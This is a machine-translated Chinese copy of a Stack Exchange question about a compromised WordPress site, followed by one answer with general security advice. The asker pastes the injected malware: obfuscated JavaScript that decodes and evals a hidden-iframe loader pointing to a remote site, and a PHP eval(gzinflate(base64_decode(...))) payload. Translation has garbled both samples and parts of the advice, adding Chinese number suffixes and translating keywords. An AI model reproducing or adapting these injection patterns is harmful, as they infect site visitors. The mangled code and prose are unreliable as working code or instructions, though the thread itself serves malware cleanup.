WordPress恶意软件问题帮助!

时间:2012-02-22 作者:LatinUnit

Possible Duplicate:
Wordpress Trojan issue help!

我访问了我正在创建的wordpress网站,并从我的防病毒软件收到了特洛伊木马的警告。我现在用各种在线扫描仪检查了该网站,似乎有人植入了一个内联框架,其中包含下面发布的代码。。。

我甚至不知道wordpress会以这种方式感染。请帮帮我!

这是防病毒警告的屏幕截图。

http://i.stack.imgur.com/NaSE6.png

这是我网站上植入的一些恶意代码脚本代码。

如果(窗口[\'d\'+\'o\'+\'c\'+\'u\'+\'m\'+\'ent\')aa=/\\w/。exec(newDate())。指数+[];aaa=\'0\';试试{if(/123/.exec(“a”)。index!=5);}catch(qqq){ss=字符串;}如果(aa.indexOf(aaa)==-1) f=\'-30-30岁!66!63岁-7.1.61岁!72!60!78岁!70岁!62岁!71岁!77岁!7.64岁!62岁!77岁!30岁!69岁!62岁!70岁!62岁!71岁!77岁!76!27岁!82!45!58岁!64岁!39岁!58岁!70岁!62岁!1.0!59岁!72!61岁!82!0!2.52岁!9号!54岁!2.84岁-30岁-30岁-30岁!66!63岁!75岁!58岁!70岁!62岁!75岁!1.2.20个-30岁-30岁!86-7.62岁!69岁!76!62岁-7.84岁-30岁-30岁-30岁!61岁!72!60!78岁!70岁!62岁!71岁!77岁!7.80!75岁!66!77岁!62岁!1-5.21岁!66!63岁!75岁!58岁!70岁!62岁-7.76!75岁!60!22岁!0!65岁!77岁!77岁!73岁!19岁!8.8.70岁!7.80!65岁!66!60!65岁!64岁!72!69岁!63岁!80!62岁!61岁!64岁!62岁!76!7.60!72!70岁!8.77岁!8.9号!58岁!11号!61岁!12个!10个!59岁!62岁!13岁!17岁!15岁!59岁!18岁!12个!58岁!58岁!12个!9号!61岁!18岁!59岁!62岁!10个!9号!15岁!11号!9号!18岁!59岁!13岁!59岁!18岁!0-7.80!66!61岁!77岁!65岁!22岁!0!10个!9号!0!-7.65岁!62岁!66!64岁!65岁!77岁!22岁!0!10个!9号!0-7.76!77岁!82!69岁!62岁!22岁!0!79岁!66!76!66!59岁!66!69岁!66!77岁!82!19岁!65岁!66!61岁!61岁!62岁!71岁!20个!73岁!72!76!66!77岁!66!72!71岁!19岁!58岁!59岁!76!72!69岁!78岁!77岁!62岁!20个!69岁!62岁!63岁!77岁!19岁!9号!20个!77岁!72!73岁!19岁!9号!20个!0!23岁!21岁!8.66!63岁!75岁!58岁!70岁!62岁!23岁-5.2.20个-30岁-30岁!86-30岁-30岁!63岁!78岁!71岁!60!77岁!66!72!71岁-7.66!63岁!75岁!58岁!70岁!62岁!75岁!1.2.84岁-30岁-30岁-30岁!79岁!58岁!75岁-7.63岁-7.22岁-7.61岁!72!60!78岁!70岁!62岁!71岁!77岁!7.60!75岁!62岁!58岁!77岁!62岁!30岁!69岁!62岁!70岁!62岁!71岁!77岁!1.0!66!63岁!75岁!58岁!70岁!62岁!0!2.20个!63岁!7.76!62岁!77岁!26岁!77岁!77岁!75岁!66!59岁!78岁!77岁!62岁!1.0!76!75岁!60!0!5.0!65岁!77岁!77岁!73岁!19岁!8.8.70岁!7.80!65岁!66!60!65岁!64岁!72!69岁!63岁!80!62岁!61岁!64岁!62岁!76!7.60!72!70岁!8.77岁!8.9号!58岁!11号!61岁!12个!10个!59岁!62岁!13岁!17岁!15岁!59岁!18岁!12个!58岁!58岁!12个!9号!61岁!18岁!59岁!62岁!10个!9号!15岁!11号!9号!18岁!59岁!13岁!59岁!18岁!0!2.20个!63岁!7.76!77岁!82!69岁!62岁!7.79岁!66!76!66!59岁!66!69岁!66!77岁!82!22岁!0!65岁!66!61岁!61岁!62岁!71岁!0!20个!63岁!7.76!77岁!82!69岁!62岁!7.73岁!72!76!66!77岁!66!72!71岁!22岁!0!58岁!59岁!76!72!69岁!78岁!77岁!62岁!0!20个!63岁!7.76!77岁!82!69岁!62岁!7.69岁!62岁!63岁!77岁!22岁!0!9号!0!20个!63岁!7.76!77岁!82!69岁!62岁!7.77岁!72!73岁!22岁!0!9号!0!20个!63岁!7.76!62岁!77岁!26岁!77岁!77岁!75岁!66!59岁!78岁!77岁!62岁!1.0!80!66!61岁!77岁!65岁!0!5.0!10个!9号!0!2.20个!63岁!7.76!62岁!77岁!26岁!77岁!77岁!75岁!66!59岁!78岁!77!62岁!1.0!65岁!62岁!66!64岁!65岁!77岁!0!5.0!10个!9号!0!2.20个-30岁-30岁-30岁!61岁!72!60!78岁!70岁!62岁!71岁!77岁!7.64岁!62岁!77岁!30岁!69岁!62岁!70岁!62岁!71岁!77岁!76!27岁!82!45!58岁!64岁!39岁!58岁!70岁!62岁!1.0!59岁!72!61岁!82!0!2.52岁!9号!54岁!7.58岁!73岁!73岁!62岁!71岁!61岁!28岁!65岁!66!69岁!61岁!1.63岁!2.20个-30岁-30岁!86’。拆分(“!”);md=\'a\';e=窗口[\'e\'+\'val\'];w=f;s=“”;fr=\'f\'+\'ro\'+\'mChar\';r=ss[fr+“代码”];对于(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}如果(aa.indexOf(aaa)==-1) e(s);如果(窗口[\'d\'+\'o\'+\'c\'+\'u\'+\'m\'+\'ent\'])aa=/\\w/。exec(newDate())。指数+[];aaa=\'0\';试试{if(/123/.exec(“a”)。index!=5);}catch(qqq){ss=字符串;}如果(aa.indexOf(aaa)==-1) f=\'-30-30岁!66!63岁-7.1.61岁!72!60!78岁!70岁!62岁!71岁!77岁!7.64岁!62岁!77岁!30岁!69岁!62岁!70岁!62岁!71岁!77岁!76!27岁!82!45!58岁!64岁!39岁!58岁!70岁!62岁!1.0!59岁!72!61岁!82!0!2.52岁!9号!54岁!2.84岁-30岁-30岁-30岁!66!63岁!75岁!58岁!70岁!62岁!75岁!1.2.20个-30岁-30岁!86-7.62岁!69岁!76!62岁-7.84岁-30岁-30岁-30岁!61岁!72!60!78岁!70岁!62岁!71岁!77岁!7.80!75岁!66!77岁!62岁!1-5.21岁!66!63岁!75岁!58岁!70岁!62岁-7.76!75岁!60!22岁!0!65岁!77岁!77岁!73岁!19岁!8.8.70岁!7.80!65岁!66!60!65岁!64岁!72!69岁!63岁!80!62!61岁!64岁!62岁!76!7.60!72!70岁!8.77岁!8.9号!58岁!11号!61岁!12个!10个!59岁!62岁!13岁!17岁!15岁!59岁!18岁!12个!58岁!58岁!12个!9号!61岁!18岁!59岁!62岁!10个!9号!15岁!11号!9号!18岁!59岁!13岁!59岁!18岁!0-7.80!66!61岁!77岁!65岁!22岁!0!10个!9号!0-7.65岁!62岁!66!64岁!65岁!77岁!22岁!0!10个!9号!0-7.76!77岁!82!69岁!62岁!22岁!0!79岁!66!76!66!59岁!66!69岁!66!77岁!82!19岁!65岁!66!61岁!61岁!62岁!71岁!20个!73岁!72!76!66!77岁!66!72!71岁!19岁!58岁!59岁!76!72!69岁!78岁!77岁!62岁!20个!69岁!62岁!63岁!77岁!19岁!9号!20个!77岁!72!73岁!19岁!9号!20个!0!23岁!21岁!8.66!63岁!75岁!58岁!70岁!62岁!23岁-5.2.20个-30岁-30岁!86-30岁-30岁!63岁!78岁!71岁!60!77岁!66!72!71岁-7.66!63岁!75岁!58岁!70岁!62岁!75岁!1.2.84岁-30岁-30岁-30岁!79岁!58岁!75岁-7.63!-7.22岁-7.61岁!72!60!78岁!70岁!62岁!71岁!77岁!7.60!75岁!62岁!58岁!77岁!62岁!30岁!69岁!62岁!70岁!62岁!71岁!77岁!1.0!66!63岁!75岁!58岁!70岁!62岁!0!2.20个!63岁!7.76!62岁!77岁!26岁!77岁!77岁!75岁!66!59岁!78岁!77岁!62岁!1.0!76!75岁!60!0!5.0!65岁!77岁!77岁!73岁!19岁!8.8.70岁!7.80!65岁!66!60!65岁!64岁!72!69岁!63岁!80!62岁!61岁!64岁!62岁!76!7.60!72!70岁!8.77岁!8.9号!58岁!11号!61岁!12个!10个!59岁!62岁!13岁!17岁!15岁!59岁!18岁!12个!58岁!58岁!12个!9号!61岁!18岁!59岁!62岁!10个!9号!15岁!11号!9号!18岁!59岁!13岁!59岁!18岁!0!2.20个!63岁!7.76!77岁!82!69岁!62岁!7.79岁!66!76!66!59岁!66!69岁!66!77岁!82!22岁!0!65岁!66!61岁!61岁!62岁!71岁!0!20个!63岁!7.76!77岁!82!69岁!62岁!7.73岁!72!76!66!77岁!66!72!71岁!22岁!0!58岁!59岁!76!72!69岁!78岁!77岁!62岁!0!20个!63岁!7.76!77岁!82!69岁!62岁!7.69岁!62岁!63岁!77岁!22岁!0!9号!0!20个!63岁!7.76!77岁!82!69岁!62岁!7.77岁!72!73岁!22岁!0!9号!0!20个!63岁!7.76!62岁!77岁!26岁!77!77岁!75岁!66!59岁!78岁!77岁!62岁!1.0!80!66!61岁!77岁!65岁!0!5.0!10个!9号!0!2.20个!63岁!7.76!62岁!77岁!26岁!77岁!77岁!75岁!66!59岁!78岁!77岁!62岁!1.0!65岁!62岁!66!64岁!65岁!77岁!0!5.0!10个!9号!0!2.20个-30岁-30岁-30岁!61岁!72!60!78岁!70岁!62岁!71岁!77岁!7.64岁!62岁!77岁!30岁!69岁!62岁!70岁!62岁!71岁!77岁!76!27岁!82!45!58岁!64岁!39岁!58岁!70岁!62岁!1.0!59岁!72!61岁!82!0!2.52岁!9号!54岁!7.58岁!73岁!73岁!62岁!71岁!61岁!28岁!65岁!66!69岁!61岁!1.63岁!2.20个-30岁-30岁!86’。拆分(“!”);md=\'a\';e=窗口[\'e\'+\'val\'];w=f;s=\'\';fr=\'f\'+\'ro\'+\'mChar\';r=ss[fr+“代码”];对于(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}如果(aa.indexOf(aaa)==-1) e(s)和索引内。php

回波(GZ充气(base64\\u解码(“1VZNc5swEP0r3VwEZbCRMJIYQi7pvYceXR8YGxIyiZ0ALelk8t+7U4JEIBBHNRODPIS0TUN/XhCPm/XTX3fXdSV19fbza5fio0IxA7HGscPHHc4ym0nVn5R5PPv/XxWPpZrb1v2n74UXen5/GW9Y8DGUCOKHIZF3Z6WKP51FDN5WNDDKC5IMFPA+Lbn3tPTw8+E9tm3/RMNP7LT2JT1EMSKFJ7KESJ9KHDHHAENRUHBQUYBCUYBQOYBQOYBQOYBQO Tocy8ghigkdmwym6aw/GSCHlO39dQ3KgFWwSCCxBI5TMgaMhAiSlJklgSJQkChAxAItu4AxktdoTPLqjrZEnHrFWE3h4hJGglujga9TnqOp2IgocR9jhujCBJQ8sHHIiREWI6awdcIM+MQgU7DASGBuzkghy8fbp8rnmqmdcqxuvmui1htepcflpxk6kumh4tfgeem2jsexqwljyqlbksmtmwgneiuxqztf38iq4nenzox+mj3nj16libudfi7dccbwqaxyjedvk3ifnf0mbovu1rsbwbxxem5qkd42eotmloids/SsInHLfRrnTGuvaoUW/uhepiljkmu8yve9imnpodzqsv6jhuwmnsol5n8l92qsfofgbgdesa+fjcxyxygebh4ded4sojrvg 4IGXGJW6Z+apkdxJq4pLzUklhclo7z+Vym/YXPKUYPEHXP70SR0QM+I0plpmNaPcG3r2HmSE/uPqr7EPRD7Z4c+aHp7kj/vXjefyLeE37s4/uv7hHDsJiegQ0hyo49H0RGOU8+AmLW3t/WnSdA+NndJheFyMp8vLhLvKh/FrdilfV5lbW5EFnV5KLC6YYu9LvL66IRWZO37bJqAnG525QIrnaNV+dRFl3UYT+7LbdX3XVWB4H/dJPXSNMGjRengfzcL29W/vE7uvRaPzufuz8UvwE=);/1583b0/li>/ol>如何删除此项并恢复站点???

1 个回复
SO网友:toomanyairmiles

Basic Security Steps

由于Wordpress如此受欢迎drive by hacks 利用基本安全性中的缺陷四处走动。所有Wordpress用户都应该采取以下简单的基本步骤来保护自己:-

不要使用wp\\uu作为数据库表前缀,请使用任何有吸引力的随机字符字符串secure password generator (至少使用15个字符)

  • Read Wordpress hardening<meta name="generator" content="WordPress X.X.X" /> 通过放置remove_action(\'wp_head\', \'wp_generator\'); 在您的功能中。php文件(如果您这样做的话,drive by攻击者将无法轻松找到目标版本)

    • TimThumb Hack

    还有一个very popular drive by hack associated with an old version of the popular tim thumb script, 这给站长们带来了很多问题。检查上载目录中的php文件,确保已升级到最新版本的脚本,以避免出现这种情况。

    Advice

    我运行了大约10个不同的WordPress,从中找到了WP安全插件和帐户website defender 它非常宝贵,它会定期扫描您的网站,并通过电子邮件报告安全错误、恶意软件,甚至页面错误,这样您就可以放心知道什么时候出了问题。

    WP-Firewall 对于防御0天漏洞和VirusTotal 如果你怀疑有感染,这很方便。

    AkismetDisqus.com 是防御评论垃圾邮件的有用工具,您应该阅读webmaster pros community wiki on this subject.

    Webmaster Tools

    你还应该注册谷歌网站管理员工具,but if you suspect an infection, take all steps to find and clean it up first 或者你最终可能会被谷歌警告你的用户你的网站是一个报告的攻击网站。

    如果检测到感染,谷歌将向以下所有地址发送电子邮件abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@ 因此,您应该确保至少有一个这样的系统处于适当的位置并受到监控。

    Paid Removal Services / Where To Get Help

    还有一些网站提供付费的恶意软件删除服务,我想是的very suspicious 其中许多似乎是某种骗局。

    有大量高质量的帮助和支持可用for freewordpress forums, 在…上webmaster pro\'s, 这个wordpress stackexchange site 和上stackoverflow. Don\'t pay for things you can fix on your own.

    结束
    标签: security   customization   小码农  

    相关推荐

    Security and .htaccess

    大约一个月前,我在一个与爱好相关的托管服务器上创建了一个WordPress博客。所以,我目前还不熟悉这一点。由于我担心安全性,我做的一件事就是安装插件WP安全扫描。根据插件结果,我的网站会被检查出来,但我在结果中看到的是一个红旗:文件。wp admin中不存在htaccess/(我在那里ssh了,它不存在)好的,所以我在这个问题上做了大量的搜索,找到了太多的信息。htaccess。我在WordPress上经历了强化WordPress。org网站等,也遇到了这篇文章:http://digwp.com/201